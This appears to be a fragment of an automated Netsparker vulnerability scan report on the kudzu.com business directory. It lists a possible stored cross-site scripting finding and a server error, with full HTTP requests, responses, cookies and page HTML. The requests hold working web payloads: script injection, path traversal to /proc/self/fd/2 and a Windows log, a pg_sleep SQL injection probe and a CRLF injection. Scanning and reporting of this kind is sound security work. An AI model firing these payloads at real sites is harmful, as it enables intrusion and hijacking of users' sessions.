<!-- ProfileMark -->
<h1 class="results">Woodston plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=../../../../../../../../../../proc/self/fd/2&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=../../../../../../../../../../proc/self/fd/2&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=../../../../../../../../../../proc/self/fd/2&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>
..
[Possible] Permanent Cross-site Scripting

[Possible] Permanent Cross-site Scripting

1 TOTAL
IMPORTANT

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /controller.jsp

/controller.jsp

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=../../../../..

Injection URL

http://www.kudzu.com/controller.jsp?N=0&searchVal='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000029)%3C/script%3E&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a

Injection Request

GET /controller.jsp?N=0&searchVal='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000029)%3C/script%3E&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012|%27%3BSELECT+pg_sleep%2825%29--&New+York%2C+NY+10012|plumber+electrician&Woodston%2C+KS+67675; ERROR=; locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Identification Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=../../../../../../../../../../windows/iis6.log&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012|plumber+electrician&New+York%2C+NY+10012|%27%3BSELECT+pg_sleep%2825%29--&New+York%2C+NY+10012; ERROR=; locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:26:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:26:19 GMT; Path=/,RECENT_SEARCH=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012|plumber+electrician&New+York%2C+NY+10012|%27%3BSELECT+pg_sleep%2825%29--&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:26:19 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Transfer-Encoding: chunked
Content-Type: text/html


Identification Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:26:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:26:19 GMT; Path=/,RECENT_SEARCH=plumber+electrician&Woodston%2C+KS+67675|%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000029%29%3C%2Fscript%3E&New+York%2C+NY+10012|plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:26:19 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in Woodston, KS - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in Woodston, KS? Get reviews, maps & directions and more for Woodston, KS plumber electrician on Kudzu.com.">
<meta name="keywords" content="Woodston KS plumber electrician, Woodston KS plumber electrician reviews, Best plumber electrician in Woodston KS, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 67675, -1, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 67675, -1, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="67675"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=67675&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="Woodston, KS 67675" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 1</b> of <b>1</b> for
<!-- ProfileMark -->
<h1 class="results">Woodston plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=../../../../../../../../../../windows/iis6.log&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=../../../../../../../../../../windows/iis6.log&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=../../../../../../../../../../windows/iis6.log&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>
..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /controller.jsp

/controller.jsp CONFIRMED

http://www.kudzu.com/controller.jsp?N=%0D%0Ans:netsparker056650=vuln&searchVal=plumber%20electrician..

Parameters

Parameter Type Value
N GET ns:netsparker056650=vuln
searchVal GET plumber electrician
currentLocation GET new york city
searchType GET keyword
Ns GET P_PremiumPlacementce97c"><script>alert(1)</script>cf1e0696b9a

Request

GET /controller.jsp?N=%0D%0Ans:netsparker056650=vuln&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 19 Jan 2012 13:25:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:25:45 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:25:45 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

















<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<!-- google_ad_section_start -->
<title>Kudzu.com :: Kudzu.com :: We're Sorry</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta property="fb:app_id" content="287431397950764"/>
<meta name="description" content="Kudzu.com is where to find the best - and avoid the worst - in New York, NY. Local reviews and ratings of restaurants, doctors, mechanics, home services, beauty salons, daycare, and more." />
<meta name="keywords" content="Reviews, Ratings, Recommendations, Local Advertising, Yellow Pages, Restaurants, Doctors, Mechanics, Day Care, Beauty Salons, Preschools" />

<!-- google_ad_section_end -->

<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<script language="JavaScript" src="/javascript/searchUtil.js"></script>

</head>
<body>
<!--header section-->





























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
